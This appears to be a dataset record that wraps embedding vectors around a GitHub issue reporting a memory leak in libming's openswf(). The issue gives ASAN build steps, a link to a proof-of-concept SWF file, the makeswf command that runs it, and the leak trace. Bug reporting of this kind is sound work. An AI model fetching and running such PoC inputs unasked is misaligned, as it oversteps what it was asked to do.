-0.015990769490599632, -0.016177795827388763, 0.016418257728219032, 0.01267772726714611, 0.012196801602840424, 0.008810285478830338, -0.01864921674132347, 0.005303538404405117, -0.0037238318473100662, 0.003576882416382432, 0.017794238403439522, 0.02654440887272358, -0.004608868155628443, 0.0049862610176205635, 0.009351327084004879, 0.0007289025234058499, -0.00997920148074627, 0.01237046904861927, 0.003700453555211425, -0.007521138526499271, -0.0030926172621548176, -0.013893400318920612, -0.0076012928038835526, -0.01763392984867096, 0.004612207878381014, -0.018622498959302902, 0.01122159231454134, -0.008402835577726364, -0.00001718149724183604, -0.0041379621252417564, -0.010406690649688244, -0.009671944193542004, 0.026143638417124748, 0.008469630032777786, -0.018943116068840027, -0.0007017669850029051, -0.005240082740783691, -0.024700861424207687, 0.0019053329015150666, 0.008436232805252075, 0.0029339788015931845, 0.006525890436023474, -0.023471830412745476, -0.006666160188615322, -0.030699070543050766, -0.010045996867120266, -0.021174075081944466, 0.0029256294947117567, 0.016618642956018448, -0.01917022094130516, 0.011802710592746735, -0.009678623639047146, 0.03171435743570328, -0.004769176710397005, -0.019223656505346298, -0.0009092495311051607, -0.007294035051018, 0.017099568620324135, -0.009284531697630882, -0.013265524990856647, -0.0000302665721392259, -0.008489669300615788, 0.007294035051018, 0.0022743763402104378, 0.009725379757583141, 0.008108936250209808, 0.006071683019399643, 0.007521138526499271, -0.021361101418733597, -0.02590317465364933, -0.014026990160346031, -0.01784767583012581, 0.011081322096288204, 0.007461023051291704, 0.0067329551093280315, 0.0138399638235569, -0.016004128381609917, 0.0003120587789453566, -0.027412746101617813, 0.0012340411776676774, 0.0025782943703234196, -0.01174259465187788, 0.0016840738244354725, -0.007280675694346428, -0.001045344746671617, -0.025315377861261368, -0.01215672492980957, 0.029950963333249092, 0.018408754840493202, -0.0034065546933561563, 0.01907670684158802, 0.005744386464357376, -0.00005578442141995765, 0.008690054528415203, -0.01347259059548378, 0.005894675850868225, 0.010687231086194515, 0.03251589834690094, -0.009378044866025448, 0.0011764302616938949, 0.027947107329964638, -0.0050096395425498486, 0.005300198681652546, 0.02002519927918911, -0.009985880926251411, 0.0008065519505180418, 0.012944907881319523, 0.0017166364705190063, 0.008149013854563236, 0.014868609607219696, -0.0007685621967539191, -0.031126558780670166, -0.034706782549619675, 0.012276955880224705, 0.007628011051565409, 0.01653848960995674, 0.012450623326003551, 0.0011246640933677554, 0.0007501934887841344, 0.004979581572115421, -0.002414646092802286, -0.010767385363578796, -0.02100040763616562, -0.02275044284760952, 0.008583182469010353, -0.0005694290157407522, -0.005577398464083672, 0.0020923593547195196, -0.00026342354249209166, 0.02225615829229355, 0.005741046741604805, 0.0016548509011045098, -0.00907746609300375, 0.009291211143136024, -0.009531673975288868, -0.0010536941699683666, 0.022363029420375824, -0.011194874532520771, 0.001320039969868958, -0.018756089732050896, -0.008830324746668339, 0.0017684027552604675, 0.008249206468462944, -0.007581254467368126, -0.01017958763986826, 0.0073407916352152824, 0.0008015423081815243, 0.0019136822083964944, 0.0049094464629888535, 0.007300714496523142, 0.009959163144230843, 0.00042957658297382295, 0.004438540432602167, 0.017901111394166946, 0.006873225327581167, -0.005557360127568245, -0.012083250097930431, -0.0007255627424456179, -0.016311386600136757, 0.02556919865310192, 0.008823644369840622, 0.012978306040167809, 0.009698661975562572, 0.012610931880772114, 0.007888511754572392, 0.002551576355472207, -0.0057043093256652355, -0.02997768297791481, 0.010640474036335945, -0.028000544756650925, 0.005487225018441677, 0.013065139763057232, -0.0015329496236518025, -0.0011330134002491832, -0.015723587945103645, 0.012811318039894104, -0.0036937741097062826, 0.011088001541793346, -0.02130766585469246, 0.019090065732598305, 0.010199625976383686, -0.006252029910683632, 0.003974313847720623, -0.011161476373672485, 0.021761873736977577, -0.0001511241280240938, -0.014080426655709743, -0.024901246652007103, -0.01540297083556652, 0.005674251355230808, 0.005206685047596693, 0.016645362600684166, -0.002463072771206498, 0.008990632370114326, -0.008462950587272644, 0.004508675541728735, -0.00740090711042285, 0.004662304185330868, -0.013853322714567184, 0.004592169541865587, 0.0032846536487340927, -0.00545716704800725, -0.0028872222173959017, -0.021107280626893044, -0.009899047203361988, -0.01106796320527792, 0.006692878436297178, 0.0003911693347617984, 0.03291666880249977, -0.008108936250209808, 0.005988189019262791, 0.013338999822735786, -0.015883896499872208, -0.0051666079089045525, -0.010253061540424824, -0.02538217231631279, -0.010814141482114792, 0.009985880926251411, -0.008102256804704666, 0.015964051708579063, 0.03184794634580612, 0.008369437418878078, -0.0007330772350542247, 0.030057836323976517, -0.004725759848952293, -0.005293518770486116, 0.000876686885021627, 0.005607456434518099, 0.0333174429833889, 0.02792038954794407, -0.006649461109191179, 0.0029339788015931845, -0.008776888251304626, 0.023926038295030594, 0.007000136189162731, -0.017380109056830406, 0.021962258964776993, -0.009925765916705132, -0.012630971148610115, -0.002284395508468151, -0.005721008405089378, -0.013786527328193188, 0.021842027083039284, 0.012403867207467556, -0.0044485596008598804, -0.03104640543460846, -0.007614651694893837, 0.016511771827936172, 0.019424041733145714, 0.03192810341715813, -0.011555568315088749, -0.009865649975836277, -0.0006011567311361432, 0.014601428993046284, 0.014093785546720028, -0.00036987836938351393, 0.026744794100522995, -0.0054705264046788216, 0.0008474640198983252, -0.003239566693082452, -0.018569063395261765, -0.006759673357009888, -0.006515870802104473, -0.01929045096039772, -0.003653696971014142, -0.0026200413703918457, 0.004388444125652313, 0.005547340493649244, 0.008062179200351238, 0.010613756254315376, -0.01552320271730423, 0.004972902126610279, -0.007247278466820717, 0.013232127763330936, -0.011515490710735321, -0.022950828075408936, 0.0005807006964460015, -0.022055773064494133, -0.008883760310709476, -0.002586643910035491, -0.0118962237611413, 0.00852974597364664, -0.013278883881866932, 0.008516387082636356, 0.03200825676321983, -0.0031460535246878862, 0.0038340440951287746, -0.006395639386028051, 0.013586142100393772, 0.0005564874154515564, -0.010139510035514832, -0.005326916463673115, -0.007247278466820717, -0.001791781047359109, 0.02409970574080944, -0.00643905671313405, -0.00770816532894969, 0.02409970574080944, -0.013492628931999207, 0.0011538869002833962, 0.0020806703250855207, 0.010907654650509357, -0.002860504202544689, -0.014013631269335747, -0.0010253061773255467, 0.005016318988054991, -0.005213364493101835, -0.02128094807267189, -0.027840236201882362, -0.020439328625798225, 0.017901111394166946, -0.023471830412745476, -0.006405659019947052, -0.017473621293902397, 0.011448696255683899, 0.01742018572986126, 0.012170083820819855, 0.017099568620324135, 0.002443034201860428, -0.0074476636946201324, 0.012236879207193851, 0.003857422387227416, 0.0021875426173210144, -0.008402835577726364, 0.013759809546172619, -0.00834271963685751, 0.00766140827909112, 0.004896087571978569, -0.013018382713198662, 0.02324472740292549, 0.018916398286819458, 0.0005435458733700216, -0.013759809546172619, 0.0020289039239287376, 0.005634174216538668, -0.0006287097348831594, -0.010346575640141964, 0.008543104864656925, 0.004515354987233877, 0.01711292751133442, 0.0034833692479878664, 0.002474761800840497, -0.0034232535399496555, -0.00912422314286232, -0.0008478814852423966, -0.007046892773360014, 0.010373293422162533, -0.009758777916431427, 0.004475277848541737, 0.006248690187931061, 0.014294170774519444, -0.021935541182756424, 0.017219800502061844, -0.002777010202407837, -0.00523674301803112, 0.011602324433624744, -0.014735018834471703, -0.010099433362483978, 0.0148018142208457, -0.0013459231704473495, 0.010152868926525116, 0.021013766527175903, -0.004739118739962578, -0.015496484935283661, -0.01727323606610298, 0.01028645969927311, -0.00796198658645153, 0.024473758414387703, 0.008543104864656925, -0.02047940529882908, -0.009130902588367462, -0.009264493361115456, -0.015242663212120533, -0.0072873556055128574, 0.005841239355504513, -0.006388959940522909, 0.026103561744093895, -0.011275028809905052, 0.009725379757583141, 0.003192810108885169, 0.02237638831138611, -0.001724985777400434, -0.0023979474790394306, -0.030137989670038223, 0.0018134894780814648, 0.014347607269883156, 0.011462055146694183, -0.014026990160346031, 0.01824844628572464, 0.008670016191899776, -0.0023528605233877897, -0.020385893061757088, -0.013773168437182903, 0.010874257422983646, 0.006846507079899311, -0.014721659943461418, -0.0058545987121760845, 0.01699269749224186, -0.015336176380515099, 0.023498548194766045, -0.0048059141263365746, 0.026063483208417892, -0.011468734592199326, 0.003727171802893281, 0.003227877663448453, 0.028053980320692062, 0.01782095804810524, -0.0022543377708643675, -0.010707269422709942, 0.007066931109875441, 0.023632138967514038, 0.007628011051565409, -0.0036770752631127834, 0.000236705454881303, -0.0067529939115047455, 0.026197073981165886, -0.010172907263040543, 0.017473621293902397, 0.01143533643335104, 0.006445736158639193, 0.019824812188744545, 0.003456651233136654, -0.04029085859656334, -0.004491976462304592, 0.039943523705005646, -0.006763013079762459, 0.0018118196167051792, -0.0008462115656584501, 0.007407586555927992, -0.01848890818655491, -0.003847402986139059, -0.02464742586016655, -0.0016339774010702968, -0.008696733973920345, -0.008690054528415203, -0.009785495698451996, 0.011869505979120731, 0.025729507207870483, -0.002949007786810398, -0.0042915912345051765, 0.017259877175092697, 0.009671944193542004, 0.008462950587272644, -0.022002335637807846, 0.012544137425720692, -0.002239308785647154, -0.006358902435749769, -0.0027853595092892647, -0.01023970264941454, -0.008649976924061775, 0.023445112630724907, 0.0026985257863998413, 0.0087568499147892, 0.026677999645471573, 0.012838035821914673, -0.001664870185777545, 0.001947079785168171, 0.006960059050470591, -0.0013993593165650964, 0.028214288875460625, 0.007187162525951862, 0.01099448837339878, -0.018288522958755493, 0.01632474549114704, -0.03967634215950966, -0.010293139144778252, -0.016431616619229317, 0.02409970574080944, 0.009164300747215748, 0.01158896554261446, -0.002928969217464328, 0.012296995148062706, 0.003311371663585305, 0.009244454093277454, 0.0008508037426508963, 0.007815037854015827, 0.026477614417672157, 0.02808069810271263, 0.01028645969927311, 0.001372641185298562, 0.027439463883638382, -0.012470662593841553, 0.0018736051861196756, 0.027118848636746407, 0.013666296377778053, 0.0013926797546446323, 0.008616579696536064, -0.01929045096039772, 0.008215808309614658, -0.0037538898177444935, 0.02054620161652565, 0.01425409410148859, -0.01763392984867096, 0.006803090218454599, -0.0031978196930140257, 0.001992166507989168, 0.013746450655162334, -0.0021524750627577305, -0.006318825297057629, -0.018609140068292618, 0.004355046432465315, -0.012069891206920147, -0.007501100189983845, 0.03671063855290413, 0.007120367605239153, -0.0021658341865986586, -0.0010887616081163287, 0.009217736311256886, 0.014588070102036, 0.006529230158776045, -0.024941325187683105, -0.00327296438626945, 0.012109967879951, -0.008903798647224903, -0.008957235142588615, 0.01298498548567295, -0.005827880464494228, -0.02035917527973652, -0.0013066809624433517, 0.0009768797317519784, -0.0014861930394545197, 0.00673629529774189, -0.025368813425302505, 0.012584214098751545, 0.00901735108345747, 0.00252652820199728, 0.02320464886724949, 0.0030191426631063223, -0.025929894298315048, 0.004241494461894035, -0.0018402074929326773, -0.0019053329015150666, -0.0419473797082901, -0.005443808156996965, 0.0036804149858653545, -0.0005214199773035944, -0.002411306370049715, -0.0013918448239564896, 0.0007046893006190658, 0.024687502533197403, 0.010680550709366798, 0.015242663212120533, 0.01532281655818224, -0.0014836882473900914, -0.01935724727809429, 0.0025031499098986387, 0.012717804871499538, 0.019758017733693123, -0.011468734592199326, 0.01047348603606224, -0.0006103410851210356, -0.008169052191078663, -0.014828532934188843, -0.027292516082525253, 0.00733411218971014, -0.011602324433624744, 0.016551848500967026, 0.0011922941775992513, -0.0009768797317519784, 0.016792310401797295, -0.005179967265576124, 0.0008700073813088238, 0.02419321797788143, 0.00837611686438322, -0.0036202992778271437, 0.01983817107975483, -0.010927692987024784, -0.014427761547267437, -0.018996551632881165, -0.01143533643335104, 0.00411792378872633, 0.004091205541044474, 0.0013818255392834544, -0.022176003083586693, 0.0035702029708772898, 0.0029473379254341125, -0.0010436748852953315, -0.0047290995717048645, 0.007487740833312273, -0.014681583270430565, 0.014962122775614262, -0.002668467815965414, 0.009458199143409729, 0.015536561608314514, -0.009725379757583141, 0.0010670531773939729, -0.005480545572936535, -0.00602492643520236, -0.019517555832862854, -0.004438540432602167, 0.012056532315909863, -0.003122675232589245, -0.004572130739688873, -0.004872709047049284, 0.011341823264956474, -0.009812213480472565, -0.002827106509357691, 0.01632474549114704, 0.0001930798462126404, 0.007360829971730709, -0.009818892925977707, 0.002354530617594719, -0.0064757936634123325, 0.011722556315362453, 0.009304570034146309, -0.02220272086560726, 0.014401043765246868, -0.012530777603387833, 0.014735018834471703, -0.0006237000925466418, -0.0038974995259195566, -0.00008036296640057117, 0.012323712930083275, -0.03612283989787102, 0.014708301052451134, 0.00359024154022336, 0.01073398720473051, 0.009892367757856846, 0.021815309301018715, 0.007875152863562107, 0.0021341063547879457, -0.011782672256231308, -0.005326916463673115, 0.008015423081815243, -0.019637785851955414, 0.02590317465364933, -0.0069333408027887344, -0.0021524750627577305, -0.0012582544004544616, -0.01824844628572464, 0.04619555547833443, 0.00489942729473114, 0.010486844927072525, 0.025515763089060783, 0.00816237274557352, 0.008182411082088947, 0.019063347950577736, -0.01311857532709837, 0.011582286097109318, -0.005443808156996965, 0.006252029910683632, -0.007380868773907423, 0.0061651961877942085, -0.004849330987781286, -0.014641505666077137, -0.021080562844872475, -0.008843683637678623, -0.004458579234778881, -0.008503028191626072, 0.019704582169651985, 0.007815037854015827, 0.010867577977478504, 0.0012273616157472134, 0.022576775401830673, -0.015496484935283661, -0.0036102801095694304, 0.024353526532649994, -0.007233919110149145, 0.00826924480497837, -0.016485054045915604, 0.009825572371482849, 0.015937332063913345, -0.0039342367090284824, -0.005220044404268265, -0.0035334655549377203, 0.01852898672223091, -0.0014937075320631266, 0.016404898837208748, 0.0067329551093280315, -0.015336176380515099, 0.014093785546720028, 0.035321298986673355, -0.035160988569259644, -0.009678623639047146, -0.023899320513010025, 0.012437264434993267, 0.0030425209552049637, 0.0107005899772048, -0.0011188194621354342, 0.01446783822029829, 0.01607092283666134, 0.007634690497070551, -0.012978306040167809, 0.001129673677496612, -0.007374189328402281, 0.013051780872046947, 0.011074642650783062, 0.0009234435274265707, -0.009291211143136024, -0.0199049673974514, -0.017553776502609253, -0.00770816532894969, 0.007407586555927992, -0.007634690497070551, -0.016765592619776726, 0.021508051082491875, -0.001129673677496612, 0.01178935170173645, -0.0009526664507575333, 0.006395639386028051, -0.015242663212120533, 0.008670016191899776, -0.0015237652696669102, 0.005133210681378841, 0.020893536508083344, -0.003189470386132598, 0.013265524990856647, -0.012317033484578133, -0.003780607832595706, 0.013412474654614925, 0.012664368376135826, 0.008436232805252075, 0.03692438080906868, -0.011916262097656727, -0.008075539022684097, -0.008289283141493797, -0.006639441940933466, 0.0036269789561629295, -0.02955019287765026, 0.0199049673974514, 0.02198897674679756, -0.004518694709986448, 0.0048059141263365746, -0.0028872222173959017, 0.0037572295404970646, -0.004478617571294308, -0.023658856749534607, -0.003326400648802519, 0.012216840870678425, -0.008429553359746933, 0.026998616755008698, 0.00598484929651022, 0.007955307140946388, -0.022336311638355255, -0.012637650594115257, -0.008282603695988655, -0.005988189019262791, 0.0022693665232509375, 0.00855646375566721, 0.014735018834471703, 0.013345679268240929, 0.0034399523865431547, -0.007968666031956673, 0.006288767326623201, -0.00755453621968627, 0.004261533264070749, -0.021908823400735855, -0.016151078045368195, 0.012931548990309238, 0.01848890818655491, -0.0014694941928610206, 0.013659616932272911, -0.005036357324570417, 0.0023294822312891483, 0.02526194229722023, 0.006893263664096594, 0.01696597784757614, 0.025248583406209946, -0.0010119471698999405, 0.024901246652007103, 0.019009912386536598, -0.017954546958208084, 0.006138477940112352, 0.0012908170465379953, 0.021227512508630753, 0.03080594167113304, 0.0049094464629888535, 0.0014603098388761282, 0.005286839324980974, 0.006542589049786329, -0.00975209753960371, 0.033050261437892914, -0.001277458039112389, 0.02192218229174614, -0.0274661835283041, -0.014107144437730312, 0.009364685975015163, -0.003974313847720623, 0.007774960249662399, -0.018261805176734924, 0.023712292313575745, 0.01931716874241829, 0.030057836323976517, -0.0008533085929229856, -0.00823584757745266, 0.02272372506558895, -0.0011305086081847548, 0.014708301052451134, 0.011535529978573322, 0.018141573294997215, 0.010246382094919682, 0.008837004192173481, -0.004445219878107309, 0.002463072771206498, 0.02654440887272358, 0.00471574068069458, 0.02734595164656639, 0.0023428413551300764, -0.009344647638499737, 0.00008015423372853547, 0.008543104864656925, -0.011348502710461617, -0.002661788370460272, 0.006128458771854639, 0.009498275816440582, -0.005417089909315109, 0.01625794917345047, 0.005754405632615089, 0.007060251664370298, 0.004699041601270437, -0.0020756605081260204, 0.007641369942575693, -0.0007401742041110992, 0.0032479162327945232, 0.015549920499324799, -0.00852974597364664, -0.011074642650783062, 0.015336176380515099, 0.011428656987845898, -0.008369437418878078, 0.012377149425446987, -0.017834316939115524, 0.017500340938568115, -0.011996416375041008, -0.003603600664064288, -0.008676695637404919, -0.01929045096039772, 0.00130918575450778, 0.027292516082525253, -0.00759461335837841, 0.0026250509545207024, -0.0060883816331624985, 0.008716772310435772, 0.02850818820297718 ]
null
null
null
null
null
null
null
null
null
[ "libming", "libming" ]
A memory leak occurs when makeswf parse a valid swf file, and the filename extension is `.swf`. ## Test Environment Ubuntu 20.04, 64 bit libming (master 04aee52) ## Steps to reproduce 1. compile libming with ASAN ``` $ CC="clang -fsanitize=address,fuzzer-no-link -g" CFLAGS+=" -fcommon" ./configure $ make ``` 2. Download the poc file from [here](https://raw.githubusercontent.com/Marsman1996/pocs/master/libming/poc-makeswf-04aee52-openswf-leak.swf) and run cmd `$ makeswf $POC` ## ASAN report ``` $ ./bin_asan/bin/makeswf ./poc-makeswf-04aee52-openswf-leak.swf Output file name: out.swf Output compression level: 9 Output SWF version: 6 Adding prebuilt clip ./poc-makeswf-04aee52-openswf-leak.swf to frame 0... done. Saving output to out.swf... done. ================================================================= ==1431036==ERROR: LeakSanitizer: detected memory leaks Direct leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4c567f in malloc /home/ubuntu178/Downloads/llvm12/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3 #1 0x523218 in openswf /home/ubuntu178/cvelibf/test/libming/04aee52/build_asan/src/blocks/../../../code/src/blocks/fromswf.c:271:41 #2 0x5226fe in newSWFPrebuiltClip_fromInput /home/ubuntu178/cvelibf/test/libming/04aee52/build_asan/src/blocks/../../../code/src/blocks/fromswf.c:1302:8 #3 0x4ff753 in embed_swf /home/ubuntu178/cvelibf/test/libming/04aee52/build_asan/util/../../code/util/makeswf.c:699:14 #4 0x4fdd89 in main /home/ubuntu178/cvelibf/test/libming/04aee52/build_asan/util/../../code/util/makeswf.c:401:4 #5 0x7f85ac9be0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: 88 byte(s) leaked in 1 allocation(s). ```
Memory leak in openswf() at fromswf.c:271
https://api.github.com/repos/libming/libming/issues/262/comments
0
2023-01-02T04:15:11
2023-01-02T13:53:48Z
https://github.com/libming/libming/issues/262
1,516,011,252
262
false
This is a GitHub Issue repo:libming owner:libming Title : Memory leak in openswf() at fromswf.c:271 Issue date: --- start body --- A memory leak occurs when makeswf parse a valid swf file, and the filename extension is `.swf`. ## Test Environment Ubuntu 20.04, 64 bit libming (master 04aee52) ## Steps to reproduce 1. compile libming with ASAN ``` $ CC="clang -fsanitize=address,fuzzer-no-link -g" CFLAGS+=" -fcommon" ./configure $ make ``` 2. Download the poc file from [here](https://raw.githubusercontent.com/Marsman1996/pocs/master/libming/poc-makeswf-04aee52-openswf-leak.swf) and run cmd `$ makeswf $POC` ## ASAN report ``` $ ./bin_asan/bin/makeswf ./poc-makeswf-04aee52-openswf-leak.swf Output file name: out.swf Output compression level: 9 Output SWF version: 6 Adding prebuilt clip ./poc-makeswf-04aee52-openswf-leak.swf to frame 0... done. Saving output to out.swf... done. ================================================================= ==1431036==ERROR: LeakSanitizer: detected memory leaks Direct leak of 88 byte(s) in 1 object(s) allocated from: #0 0x4c567f in malloc /home/ubuntu178/Downloads/llvm12/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3 #1 0x523218 in openswf /home/ubuntu178/cvelibf/test/libming/04aee52/build_asan/src/blocks/../../../code/src/blocks/fromswf.c:271:41 #2 0x5226fe in newSWFPrebuiltClip_fromInput /home/ubuntu178/cvelibf/test/libming/04aee52/build_asan/src/blocks/../../../code/src/blocks/fromswf.c:1302:8 #3 0x4ff753 in embed_swf /home/ubuntu178/cvelibf/test/libming/04aee52/build_asan/util/../../code/util/makeswf.c:699:14 #4 0x4fdd89 in main /home/ubuntu178/cvelibf/test/libming/04aee52/build_asan/util/../../code/util/makeswf.c:401:4 #5 0x7f85ac9be0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: 88 byte(s) leaked in 1 allocation(s). ``` --- end body ---
1,950
[ -0.025467807427048683, 0.02152290940284729, -0.006207415834069252, 0.0004917527548968792, 0.03596820309758186, 0.03315456211566925, -0.012356817722320557, 0.03306754305958748, -0.03724449500441551, 0.01849171705543995, -0.029934827238321304, 0.012516354210674763, -0.01121105719357729, 0.0010025411611422896, -0.004104435909539461, 0.002962300553917885, -0.010355361737310886, 0.020522180944681168, -0.006522862706333399, -0.02929668128490448, 0.015199466608464718, -0.0287745613604784, -0.03466290608048439, 0.023437345400452614, -0.023727411404252052, -0.007400312926620245, -0.012617877684533596, 0.002839022548869252, -0.027150191366672516, 0.020812246948480606, 0.021189332008361816, 0.03486595302820206, -0.012088506482541561, 0.008259633556008339, 0.008259633556008339, -0.007461951579898596, 0.06648316234350204, 0.042175617069005966, -0.007962316274642944, 0.030021846294403076, -0.02220456302165985, -0.06091389060020447, -0.03562012314796448, -0.005014518741518259, -0.017505493015050888, 0.008694732561707497, 0.01019582524895668, -0.010659931227564812, -0.055315613746643066, 0.02121833898127079, 0.015213970094919205, -0.014329267665743828, -0.020507676526904106, -0.0519508495926857, 0.016185691580176353, -0.004303856752812862, 0.030108867213129997, 0.02295873686671257, 0.013125493191182613, 0.0278608538210392, -0.018477214500308037, 0.03005085326731205, 0.03028290718793869, 0.014423539862036705, 0.0006299874512478709, -0.0017712163971737027, -0.02922416478395462, 0.009035560302436352, -0.012110262177884579, 0.006131273228675127, -0.005119667388498783, -0.01615668460726738, 0.004728078376501799, 0.01691085658967495, 0.0206817165017128, -0.011653407476842403, 0.03147217631340027, 0.006707779597491026, -0.029789794236421585, 0.0487891249358654, -0.044670186936855316, 0.03599720820784569, -0.00536259775981307, 0.04301680997014046, 0.036055222153663635, 0.029847806319594383, -0.039071910083293915, -0.05882541462779045, -0.0018337619258090854, -0.042610716074705124, 0.00572155462577939, 0.03562012314796448, 0.02981880120933056, 0.008934037759900093, -0.011298076249659061, -0.003663897980004549, -0.022219067439436913, -0.006381455343216658, -0.0601017065346241, -0.03173323720693588, -0.05406833067536354, 0.0008362063090316951, 0.006047879345715046, -0.004035545513033867, 0.000047985551645979285, 0.0369834341108799, -0.003624014090746641, -0.018317677080631256, 0.00637782970443368, 0.10807865113019943, 0.022465623915195465, 0.004282101523131132, -0.01926039159297943, 0.011232811957597733, -0.005286455620080233, 0.03448886424303055, 0.022697675973176956, -0.0010070734424516559, -0.05079058185219765, 0.0012409392511472106, -0.0026740473695099354, -0.013415559194982052, -0.014249499887228012, -0.01015956699848175, -0.006446720100939274, 0.03034091927111149, 0.009456156753003597, -0.052530981600284576, 0.005174054764211178, -0.020014563575387, -0.0143872806802392, -0.06114594638347626, 0.011530129238963127, -0.0030819529201835394, 0.005630908999592066, -0.016069665551185608, -0.013959433883428574, 0.04423508793115616, 0.012799168936908245, 0.004401753656566143, -0.028673039749264717, -0.033850718289613724, 0.014952910132706165, -0.007099369075149298, 0.00823062751442194, -0.015620062127709389, 0.0020177727565169334, 0.005435114726424217, -0.01705588959157467, 0.031008072197437286, 0.0048477305099368095, -0.022248074412345886, 0.02213204652070999, 0.016113175079226494, 0.019840525463223457, -0.012958705425262451, 0.021914497017860413, 0.04667164385318756, 0.0005978082190267742, -0.026033436879515648, 0.003908641170710325, -0.022291583940386772, 0.006323442328721285, -0.03750555217266083, -0.01721542701125145, -0.022712180390954018, 0.013720128685235977, 0.018593240529298782, 0.004735330119729042, 0.031907275319099426, 0.006591753102838993, 0.03547509014606476, 0.012436586432158947, 0.012240791693329811, -0.032951515167951584, -0.010036288760602474, -0.004318359773606062, 0.020058074966073036, -0.036867406219244, -0.01570708304643631, 0.009913010522723198, 0.020029067993164062, -0.015315492637455463, -0.002400297438725829, -0.014938406646251678, -0.015605558641254902, 0.027382245287299156, -0.05354621261358261, -0.010398871265351772, -0.010166818276047707, -0.020101584494113922, -0.022059530019760132, -0.012588870711624622, -0.011261817999184132, 0.05502554774284363, 0.010079799219965935, -0.012922447174787521, 0.00936913676559925, 0.01332854013890028, -0.01691085658967495, 0.01480062585324049, -0.004405379761010408, -0.004361869767308235, 0.030776018276810646, -0.04803495481610298, 0.005152300000190735, -0.05444541573524475, 0.03306754305958748, 0.0007659559487365186, -0.031820256263017654, 0.009564931504428387, 0.000670777983032167, 0.009767977520823479, 0.0022117544431239367, -0.00038773685810156167, -0.002993120113387704, 0.004423508886247873, 0.02204502746462822, -0.008092845790088177, 0.007262531202286482, 0.015097943134605885, -0.029789794236421585, 0.011762182228267193, 0.002349535934627056, -0.03947800397872925, -0.009209600277245045, -0.023002246394753456, -0.012936950661242008, -0.02326330542564392, 0.003905015531927347, 0.036432307213544846, -0.019695492461323738, -0.010942745953798294, 0.031298138201236725, 0.010116057470440865, 0.017186420038342476, -0.002356787445023656, -0.01963747851550579, -0.005315462127327919, 0.015431519597768784, 0.02831045724451542, 0.01249459944665432, 0.012414831668138504, -0.011269070208072662, -0.0069543360732495785, 0.05105164274573326, -0.04403204098343849, -0.0043111080303788185, -0.010101553983986378, 0.020855756476521492, 0.026671582832932472, -0.022465623915195465, 0.003484419547021389, -0.02551131881773472, 0.0023731037508696318, -0.004216836765408516, 0.025612840428948402, 0.018607743084430695, -0.04936926066875458, -0.0065953792072832584, 0.018013108521699905, 0.007461951579898596, -0.007291537709534168, 0.044293101876974106, -0.013219764456152916, 0.004282101523131132, 0.000711568514816463, 0.017766552045941353, 0.013640360906720161, 0.001046051038429141, 0.019666485488414764, -0.0225671473890543, 0.02385794185101986, 0.0083031440153718, -0.024496085941791534, -0.013879665173590183, 0.0013261461863294244, -0.008825263008475304, -0.009746222756803036, -0.038839858025312424, 0.0009626570390537381, 0.011870956979691982, -0.013843406923115253, 0.03834674507379532, 0.015504036098718643, -0.013089234940707684, 0.03550409525632858, -0.011994235217571259, -0.02250913344323635, 0.0027755703777074814, 0.011580890975892544, -0.020551186054944992, -0.019216882064938545, 0.017273439094424248, 0.006588127464056015, 0.036287274211645126, -0.007106620818376541, 0.006566372700035572, -0.029557740315794945, -0.0075707267969846725, -0.026250986382365227, -0.007019600830972195, 0.013451817445456982, -0.014807877130806446, -0.013169003650546074, 0.01994204707443714, -0.006374203599989414, 0.014865890145301819, -0.011029765009880066, 0.00041447734110988677, 0.045192304998636246, -0.040667273104190826, -0.005090660881251097, 0.008658474311232567, -0.009166090749204159, 0.019840525463223457, 0.007795528043061495, -0.04568541795015335, -0.008672977797687054, 0.004162449389696121, -0.012965956702828407, 0.011232811957597733, -0.019869530573487282, 0.004583045374602079, 0.04023217409849167, 0.0035043617244809866, -0.02825244329869747, 0.0638725683093071, -0.027730323374271393, 0.03556210920214653, -0.01881079003214836, -0.01985502801835537, -0.017795559018850327, -0.020435160025954247, 0.00664251483976841, -0.037795618176460266, 0.00007636898226337507, 0.023828934878110886, 0.002387607004493475, 0.01419148687273264, -0.04078330099582672, -0.004757084883749485, -0.015910128131508827, -0.023350324481725693, -0.012465592473745346, 0.0012445651227608323, -0.0010931867873296142, -0.00513417087495327, 0.013654864393174648, 0.010848473757505417, 0.0009037373820319772, 0.004441638011485338, 0.04675866290926933, 0.006559120956808329, 0.0018464523600414395, -0.00005166803384781815, -0.0203191339969635, -0.0008244224009104073, -0.0005248384550213814, -0.00021585001377388835, -0.029325688257813454, -0.030979065224528313, 0.010993506759405136, 0.009847746230661869, 0.025351781398057938, 0.0006250019068829715, -0.006163905840367079, -0.01592463254928589, -0.012994963675737381, 0.004017416387796402, -0.005612779874354601, 0.04350992292165756, -0.018361186608672142, 0.040899328887462616, -0.013647612184286118, -0.03425681218504906, 0.028266945853829384, 0.02575787343084812, -0.011696917936205864, 0.02219006046652794, -0.01072519551962614, 0.011892712675035, 0.02484416589140892, -0.03428582102060318, -0.007940560579299927, 0.01857873611152172, 0.001462114742025733, 0.0382017120718956, -0.01159539446234703, -0.015968142077326775, -0.058622367680072784, 0.019913041964173317, -0.02039165049791336, -0.039768069982528687, -0.018317677080631256, 0.058941442519426346, -0.008455428294837475, -0.026236483827233315, 0.04641058295965195, -0.047454822808504105, -0.002126547507941723, -0.02166794240474701, 0.05125468969345093, 0.007577978074550629, -0.013009467162191868, 0.03985508903861046, 0.033328600227832794, -0.02574337087571621, 0.0036367042921483517, -0.009144335053861141, 0.032197341322898865, -0.037708599120378494, -0.04545336589217186, 0.010362613014876842, 0.04008714109659195, 0.05664991959929466, -0.019811518490314484, -0.011950725689530373, 0.02861502580344677, 0.03466290608048439, -0.016403241083025932, -0.019013836979866028, 0.024713635444641113, 0.03089204430580139, 0.015663571655750275, 0.0134735731408, 0.018071120604872704, 0.0038868864066898823, 0.021029796451330185, -0.0231182724237442, -0.015010923147201538, 0.007534468080848455, 0.014655591920018196, -0.009354633279144764, -0.019086353480815887, -0.04084131494164467, -0.041566479951143265, -0.057955216616392136, -0.01812913455069065, -0.011080526746809483, -0.010746951214969158, -0.0017567131435498595, -0.021493902429938316, -0.014060956425964832, 0.0012962331529706717, -0.058477334678173065, -0.002887971233576536, -0.00634157145395875, 0.04960131272673607, -0.006802051328122616, 